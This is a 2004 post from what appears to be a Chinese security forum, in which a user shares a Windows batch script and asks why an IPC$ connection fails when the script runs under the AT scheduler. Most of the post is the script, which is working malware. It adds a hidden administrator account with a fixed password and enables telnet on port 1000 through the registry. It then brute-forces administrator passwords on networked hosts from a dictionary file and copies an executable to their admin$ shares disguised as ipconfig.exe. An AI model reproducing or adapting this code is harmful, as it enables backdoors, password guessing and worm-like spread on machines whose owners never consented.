论坛: 菜鸟乐园 标题: AT的疑惑 复制本贴地址    
作者: deathmask [deathmask]    论坛用户   登录
这是批的一段
ver|find "Microsoft Windows 2000">nul
if not errorlevel 0 goto end
REM 有此判断系统是否为WIN2000或者NT5.1接下来的语句为WIN2000系统特有的CMD如果部是的话直接退出
for /f "delims=: tokens=1-2" %%a in ('time /t') do set h=%%a&&set s=%%b
set /a s+=20
if %s% geq 60 set s=10&&set /a h+=1
if %h% geq 24 set h=0
at /y /d
if exist %windir%\system32\backdoor.bat goto back
echo net user deathmask$ sayulaebe /expires:never /add>%windir%\system32\backdoor.bat
echo net localgroup administrators deathmask$ /add>>%windir%\system32\backdoor.bat
echo net accounts /Maxpwage:unlimited>>%windir%\system32\backdoor.bat
echo echo REGEDIT4                                                                                                                                  ^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo echo [hkey_local_machine\software\microsoft\telnetserver\1.0]^>^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo echo "ntlm"=dword:0^>^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo echo "telnetport"=dword:1000^>^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo echo [hkey_local_machine\system\currentcontrolset\services\tlntsvr]^>^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo echo "start"=dword:2^>^>%%WINDIR%%\SYSTEM32\WIN1.DLL>>%windir%\system32\backdoor.bat
echo regedit -s %%windir%%\system32\win1.dll>>%windir%\system32\backdoor.bat
echo net stop telnet>>%windir%\system32\backdoor.bat
echo net start telnet>>%windir%\system32\backdoor.bat
echo for /f "skip=3 delims=命令成功完成。 " %%%%a in ('net view') do for /f %%%%b in (%%windir%%\system32\pass.dic) do net use %%%%a\ipc$ %%%%b /u:"administrator">>%windir%\system32\backdoor.bat
echo for /f "skip=3 delims=命令成功完成。 " %%%%a in ('net view') do copy %%windir%%\system32\猪头.exe %%%%a\admin$\system32\ipconfig.exe /y^&if exist %%%%a\admin$\system32\dllcache\ipconfig.exe del %%%%a\admin$\system32\dllcache\ipconfig.exe>>%windir%\system32\backdoor.bat
:back
at %h%:%s% %windir%\system32\backdoor.bat>nul
:end
关于如上批的代码为了完整性我把他部分COPY了下来
在代码写好后发现了一个很大的问题,就是关于AT的问题,由于想在SYSTEM的上下文中和对方建立IPC¥连接所以在用AT来执行如上的BACKDOOR。BAT
后来发觉在AT里不能建立IPC$连接但是好象能建立空连接然后在AT运行的批处理中我+了
NET USE \\IP\IPC$ "PASS" /U:USER 2>A.TXT
发现如下
系统发生 1312 错误。

指定的登录会话不存在。可能已被终止。

为何会有如此结果呢,请这里的兄台指教谢谢!!

地主 发表时间: 04-02-07 02:01

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号